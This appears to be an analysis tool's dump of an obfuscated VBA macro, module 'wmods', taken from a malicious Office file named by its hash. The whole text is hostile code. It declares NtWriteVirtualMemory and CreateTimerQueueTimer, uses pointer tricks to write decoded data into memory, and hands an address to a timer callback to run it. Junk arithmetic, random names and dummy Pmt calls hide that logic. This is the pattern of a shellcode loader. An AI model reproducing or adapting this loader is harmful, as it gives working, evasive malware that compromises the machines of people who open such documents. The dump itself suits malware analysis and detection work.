Filename     : ./macros/4074ae1af5d6c514e895cdc9ba844dffc5e58cb13ce2665ed1a79a63bb1f937e
OLE stream   : Macros/VBA/wmods
VBA filename : wmods.bas
----------------------------------------
Attribute VB_Name = "wmods"
#If (88 - 29 + 341 + 9 - 125 + 416) > ((36 - 42 + 326) - (15 - 86 + 611) * 1) And Not ((8 - 117 + 137) - (22 - 112 + 118)) * 2 < (Win64) Then
Public Declare Function equerry _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal mileage As Any, ByVal porphyrula As Any, ByVal pleadings As Any, ByVal faedera As Any, ByVal manihot As Any) As Long
#End If
#If (88 - 29 + 341 + 9 - 125 + 416) > ((36 - 42 + 326) - (15 - 86 + 611) * 1) And Not ((8 - 117 + 137) - (22 - 112 + 118)) * 2 < (Win64) Then
Public Declare Function kilowatt _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (curtail As Any, ByVal blandishment As Any, ByVal beauteous As Any, ByVal carried As Any, ByVal bloomeria As Any, ByVal belching As Any, ByVal macintosh As Any) As Long
#End If
#If (89 - 45 + 356 + 85 - 60 + 275) > ((52 - 85 + 353) - (91 - 2 + 451) * 1) And ((58 - 43 + 13) - (1 - 37 + 64)) * 2 < (Win64) Then
Public Declare PtrSafe Function equerry _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal bryanite As Any, ByVal pelisse As Any, ByVal feroe As Any, ByVal sustentacular As Any, ByVal substantial As Any) As LongPtr
#End If
Function dolorific(fraudulent, addable, aut)
Dim anobiidae As Long
Dim encompass As Long
Dim bluejacket As Long
Dim nylons As Long
Dim housing As Long
anobiidae = (fraudulent)
housing = aut
bluejacket = addable
Pmt 0, (43 + 39), 28468, 33782, 5
encompass = 56 - 39 - 18
equerry ByVal encompass, anobiidae, bluejacket, housing, nylons
End Function
Sub nonparametric()
Dim dayboy As Long
Dim unheard As Long
dove.creativeness.Value = Day(#12/5/2013#)
varday = counterchange = dashingly
angled = "antirrhinum"
verba = corruptly
alder = "chokidar"
teashop = "hydromantes"

absinthe = "aftermath"
bemisia = heavensent
Set gite = dove.creativeness.SelectedItem
deference = 10 + 59
 Pmt 0, deference, 16863, 18452, 3

deontology = gite.Name
anomala = 11 - 10 + 7843
crocodylus = Right(deontology, anomala)
exits = alacran.cowpens(crocodylus)
conuropsis = 59 + 12
 Pmt 0, conuropsis, 13082, 32946, 8

elliptical = "fawning"
#If (44 - 64 + 420 + 109 - 7 + 198) > ((18 - 54 + 356) - (97 - 118 + 561) * 1) And ((71 - 108 + 65) - (103 - 69 - 6)) * 2 < (Win64) Then
Dim bundling As String
Dim flue As LongPtr
Dim painterly As LongPtr
Dim crumple As Long
#ElseIf (43 - 23 + 380 + 6 - 81 + 375) > ((63 - 23 + 280) - (121 - 68 + 487) * 1) And Not ((64 - 20 - 16) - (104 - 53 - 23)) * 2 < (Win64) Then
Dim homes As Byte
Dim painterly As Long
Dim bladderwrack As Variant
Dim flue As Long
#End If
baldhead = 87 - 107 + 20
understated = "aweary"
anonymously = "concur"
adjacent = 11 - 105 + 4190
buckjumper = 15 + 45
 Pmt 0, buckjumper, 34506, 29125, 5

impassion = "auditor"
transdermal = arbeit
backhand = "clutter"
orgies = 13 + 29
 Pmt 0, orgies, 37695, 32899, 6

materialization = exits
tiranno = minimize
convene = "biased"
flue = abalone(materialization)
decrement = "bridesman"
deafmute = "multitudinousness"
#If (5 - 54 + 449 + 124 - 51 + 227) > ((13 - 77 + 384) - (50 - 14 + 504) * 1) And ((121 - 65 - 28) - (76 - 15 - 33)) * 2 < (Win64) Then
Dim seraphic As Integer
Dim avail As LongPtr
Dim decigram As LongPtr
Dim dono As LongPtr
averti = 19 - 42 + 2087
#ElseIf (48 - 63 + 415 + 20 - 51 + 331) > ((103 - 25 + 242) - (108 - 34 + 466) * 1) And Not ((104 - 44 - 32) - (48 - 25 + 5)) * 2 < (Win64) Then
Dim avail As Long
manganate = 13 - 15 + 783
Dim decigram As Long
Dim dono As Long
averti = manganate + 3459

#End If
Dim apalachicola As Byte
Dim jesting As Variant
avail = 41 - 68 + 27
painterly = flue + averti
decigram = 57 - 64 + 201534
dono = 49 - 91 + 3542
groenendael = kilowatt(decigram, avail, painterly, avail, avail, avail, avail)
anesthetic = 17 + 42
 Pmt 0, anesthetic, 33797, 19576, 3

End Sub

Function abalone(ameer)
#If (20 - 21 + 401 + 64 - 81 + 317) > ((90 - 114 + 344) - (92 - 74 + 522) * 1) And ((21 - 127 + 134) - (32 - 33 + 29)) * 2 < (Win64) Then
Dim power As String
Dim breathe As LongPtr
currycomb = 5 - 85 + 88
Dim cimeter As LongPtr
Dim exculpate As String
Dim maxillomandibular As Integer
Dim lollipop As LongPtr
Dim mettle As Long
bookable = VarPtr(breathe)
abstainer = dubash(bookable, VarPtr(ameer) + (59 - 100 + 49), currycomb)
#End If
#If (126 - 118 + 392 + 26 - 15 + 289) > ((85 - 7 + 242) - (11 - 7 + 536) * 1) And Not ((107 - 86 + 7) - (118 - 39 - 51)) * 2 < (Win64) Then
Dim breathe As Long
currycomb = 22 - 104 + 86
Dim cimeter As Long
Dim lollipop As Long
bookable = VarPtr(breathe)
abstainer = dolorific(bookable, VarPtr(ameer) + (12 - 79 + 75), currycomb)
#End If
coiled = 118 - 4 - 115
cimeter = 83 - 58 - 25
farmerette = 124 - 84 - 40
lollipop = 35 - 110 + 9916
chanting = 47 - 76 + 4125
brangle = 94 - 28 - 2
timeful = multicellular(ByVal coiled, _
cimeter, ByVal farmerette, _
lollipop, ByVal chanting, _
ByVal brangle)
argues = dolorific(cimeter, breathe, 75 - 101 + 5909)
cane = 7 + 30
 Pmt 0, cane, 28460, 58224, 2

abalone = cimeter
End Function



